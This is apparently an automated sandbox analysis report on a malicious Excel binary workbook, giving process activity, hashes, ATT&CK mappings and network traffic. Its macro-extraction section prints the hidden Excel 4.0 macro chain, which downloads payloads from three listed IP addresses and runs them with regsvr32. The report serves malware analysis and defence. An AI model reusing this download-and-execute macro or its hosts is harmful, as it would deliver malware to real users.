Windows
Analysis Report
Summary-133608431-Feb-15.xlsb
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- EXCEL.EXE (PID: 2816 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - regsvr32.exe (PID: 836 cmdline:
regsvr32 C :\ProgramD ata\Hroser 1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708) - regsvr32.exe (PID: 1708 cmdline:
regsvr32 C :\ProgramD ata\Hroser 2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708) - regsvr32.exe (PID: 2992 cmdline:
regsvr32 C :\ProgramD ata\Hroser 3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Source: | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": |
Source: | Author: frack113: |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | Section loaded: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary |
---|
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 2 Scripting | Path Interception | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 2 Non-Application Layer Protocol | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 22 Exploitation for Client Execution | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 12 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Virtualization/Sandbox Evasion | Security Account Manager | 2 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 4 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Process Injection | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Scripting | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true |
| unknown | |
true |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.141.26.236 | unknown | Netherlands | 60117 | HSAE | false | |
185.252.215.41 | unknown | Russian Federation | 49619 | AIRMOBFR | false | |
188.165.62.32 | unknown | France | 16276 | OVHFR | false |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 573121 |
Start date: | 16.02.2022 |
Start time: | 09:13:19 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 9s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Summary-133608431-Feb-15.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLSB@7/4@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
Time | Type | Description |
---|---|---|
09:13:35 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.141.26.236 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
185.252.215.41 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
188.165.62.32 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AIRMOBFR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
HSAE | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
OVHFR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\393B49B5.png
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241202 |
Entropy (8bit): | 7.994790738722079 |
Encrypted: | true |
SSDEEP: | 6144:LafQTxwGF4p24e6RoPmj6M7R6SFENKq4WneZ:LacxGgF62PFNJno |
MD5: | 970E90E800998F92DF619BFA12784EDE |
SHA1: | 9602E3700EAE62493E6109B5A1592C53A75DA62C |
SHA-256: | 085DF183667B5E23760879126ADEF853988D519E39C18B5A7EBA4B17423D7B6C |
SHA-512: | 74926BDFA17E196D1A885F9FF51B139B14865430C494E6B598E8B05A8B3D1C6C2D0FF314D871F1074F367CBA5E7BD82CF050D1EBC29A46BA3E39B851E4049D0A |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 1.1464700112623651 |
Encrypted: | false |
SSDEEP: | 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X |
MD5: | 72F5C05B7EA8DD6059BF59F50B22DF33 |
SHA1: | D5AF52E129E15E3A34772806F6C5FBF132E7408E |
SHA-256: | 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164 |
SHA-512: | 6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
File type: | |
Entropy (8bit): | 7.964362195636817 |
TrID: |
|
File name: | Summary-133608431-Feb-15.xlsb |
File size: | 270134 |
MD5: | 0df7cebeecf0768966fdeb34957e4903 |
SHA1: | 3390ca486aaa46814ff6759296304ed033243799 |
SHA256: | 1f320ea67a6fa753b536d33c190b5c9a4e8d02c58767860adff70b6c24b99f13 |
SHA512: | 5309cfa4610f09f786606ef3cceb1427f7a5399d24fceef3f6bf04ca42f1c37b83521a5a7d3de5bcf52583d0da660c452ee20ce4ef85532d710d04d6cbfd6867 |
SSDEEP: | 6144:9VafQTxwGF4p24e6RoPmj6M7R6SFENKq4Wneb:DacxGgF62PFNJnq |
File Content Preview: | PK..........!.........=.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
Icon Hash: | e4e2ea8aa4b4b4b4 |
Document Type: | OpenXML |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Name: | Tiposa1111 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa11114False0Falsepre21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10) |
Name: | Tiposa |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa3False0Falsepre1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8) |
Name: | Tiposa3 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa34False0Falsepre14,7,=GOTO(Detr!K18) |
Name: | Tiposa6 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa64False0Falsepre19,7,=GOTO(Tiposa2!H20) |
Name: | Detr |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Detr4False0Falsepost25,10,=GOTO(Xwtrd!G18) |
Name: | Detr |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Detr4False0Falsepre25,10,=GOTO(Xwtrd!G18) |
Name: | Tiposa2 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa24False0Falsepre14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29) |
Name: | Vtreytr |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Vtreytr4False0Falsepost21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34) |
Name: | Vtreytr |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Vtreytr4False0Falsepre21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34) |
Name: | Xwtrd2 |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Xwtrd23False0Falsepost16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/2273529117599590.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24) |
Name: | Xwtrdferyy |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Xwtrdferyy3False0Falsepre13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/7332413132139490.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14) |
Name: | Tiposa11111 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa111114False0Falsepre11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25) |
Name: | Tiposa11111 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa111114False0Falsepost11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25) |
Name: | Xwtrd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Xwtrd3False0Falsepost20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/2273529117599590.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13) |
Name: | Xwtrd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Xwtrd3False0Falsepre20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/7332413132139490.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13) |
Name: | Tiposa3 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa34False0Falsepost14,7,=GOTO(Detr!K18) |
Name: | Tiposa1 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa14False0Falsepost10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32 "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN() |
Name: | Tiposa |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa3False0Falsepost1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8) |
Name: | Tiposa6 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa64False0Falsepost19,7,=GOTO(Tiposa2!H20) |
Name: | Xwtrd2 |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Xwtrd23False0Falsepre16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/7332413132139490.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24) |
Name: | Tiposa2 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa24False0Falsepost14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29) |
Name: | Xwtrdferyy |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Xwtrdferyy3False0Falsepost13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/2273529117599590.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14) |
Name: | Tiposa1 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa14False0Falsepre10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32 "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN() |
Name: | Tiposa1111 |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Tiposa11114False0Falsepost21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10) |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/16/22-09:14:15.102382 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 185.141.26.236 | 192.168.2.22 |
02/16/22-09:14:15.273390 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 185.252.215.41 | 192.168.2.22 |
02/16/22-09:14:15.525809 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 188.165.62.32 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 16, 2022 09:14:14.803814888 CET | 49165 | 80 | 192.168.2.22 | 185.141.26.236 |
Feb 16, 2022 09:14:14.843585014 CET | 80 | 49165 | 185.141.26.236 | 192.168.2.22 |
Feb 16, 2022 09:14:14.843709946 CET | 49165 | 80 | 192.168.2.22 | 185.141.26.236 |
Feb 16, 2022 09:14:14.844394922 CET | 49165 | 80 | 192.168.2.22 | 185.141.26.236 |
Feb 16, 2022 09:14:14.885308981 CET | 80 | 49165 | 185.141.26.236 | 192.168.2.22 |
Feb 16, 2022 09:14:15.102381945 CET | 80 | 49165 | 185.141.26.236 | 192.168.2.22 |
Feb 16, 2022 09:14:15.102569103 CET | 49165 | 80 | 192.168.2.22 | 185.141.26.236 |
Feb 16, 2022 09:14:15.126703978 CET | 49166 | 80 | 192.168.2.22 | 185.252.215.41 |
Feb 16, 2022 09:14:15.149291039 CET | 80 | 49166 | 185.252.215.41 | 192.168.2.22 |
Feb 16, 2022 09:14:15.149436951 CET | 49166 | 80 | 192.168.2.22 | 185.252.215.41 |
Feb 16, 2022 09:14:15.150301933 CET | 49166 | 80 | 192.168.2.22 | 185.252.215.41 |
Feb 16, 2022 09:14:15.172629118 CET | 80 | 49166 | 185.252.215.41 | 192.168.2.22 |
Feb 16, 2022 09:14:15.273390055 CET | 80 | 49166 | 185.252.215.41 | 192.168.2.22 |
Feb 16, 2022 09:14:15.273488045 CET | 49166 | 80 | 192.168.2.22 | 185.252.215.41 |
Feb 16, 2022 09:14:15.297432899 CET | 49167 | 80 | 192.168.2.22 | 188.165.62.32 |
Feb 16, 2022 09:14:15.324198008 CET | 80 | 49167 | 188.165.62.32 | 192.168.2.22 |
Feb 16, 2022 09:14:15.324294090 CET | 49167 | 80 | 192.168.2.22 | 188.165.62.32 |
Feb 16, 2022 09:14:15.324851036 CET | 49167 | 80 | 192.168.2.22 | 188.165.62.32 |
Feb 16, 2022 09:14:15.351388931 CET | 80 | 49167 | 188.165.62.32 | 192.168.2.22 |
Feb 16, 2022 09:14:15.525809050 CET | 80 | 49167 | 188.165.62.32 | 192.168.2.22 |
Feb 16, 2022 09:14:15.525934935 CET | 49167 | 80 | 192.168.2.22 | 188.165.62.32 |
Feb 16, 2022 09:15:20.102016926 CET | 80 | 49165 | 185.141.26.236 | 192.168.2.22 |
Feb 16, 2022 09:15:20.102237940 CET | 49165 | 80 | 192.168.2.22 | 185.141.26.236 |
Feb 16, 2022 09:15:20.276571035 CET | 80 | 49166 | 185.252.215.41 | 192.168.2.22 |
Feb 16, 2022 09:15:20.276757956 CET | 49166 | 80 | 192.168.2.22 | 185.252.215.41 |
Feb 16, 2022 09:15:20.526427031 CET | 80 | 49167 | 188.165.62.32 | 192.168.2.22 |
Feb 16, 2022 09:15:20.526506901 CET | 49167 | 80 | 192.168.2.22 | 188.165.62.32 |
Feb 16, 2022 09:16:14.707329988 CET | 49167 | 80 | 192.168.2.22 | 188.165.62.32 |
Feb 16, 2022 09:16:14.707612991 CET | 49166 | 80 | 192.168.2.22 | 185.252.215.41 |
Feb 16, 2022 09:16:14.707878113 CET | 49165 | 80 | 192.168.2.22 | 185.141.26.236 |
Feb 16, 2022 09:16:14.730110884 CET | 80 | 49166 | 185.252.215.41 | 192.168.2.22 |
Feb 16, 2022 09:16:14.734272003 CET | 80 | 49167 | 188.165.62.32 | 192.168.2.22 |
Feb 16, 2022 09:16:14.747411013 CET | 80 | 49165 | 185.141.26.236 | 192.168.2.22 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.141.26.236 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 16, 2022 09:14:14.844394922 CET | 0 | OUT | |
Feb 16, 2022 09:14:15.102381945 CET | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49166 | 185.252.215.41 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 16, 2022 09:14:15.150301933 CET | 1 | OUT | |
Feb 16, 2022 09:14:15.273390055 CET | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49167 | 188.165.62.32 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 16, 2022 09:14:15.324851036 CET | 3 | OUT | |
Feb 16, 2022 09:14:15.525809050 CET | 4 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 09:13:17 |
Start date: | 16/02/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f1c0000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 3 |
Start time: | 09:13:24 |
Start date: | 16/02/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
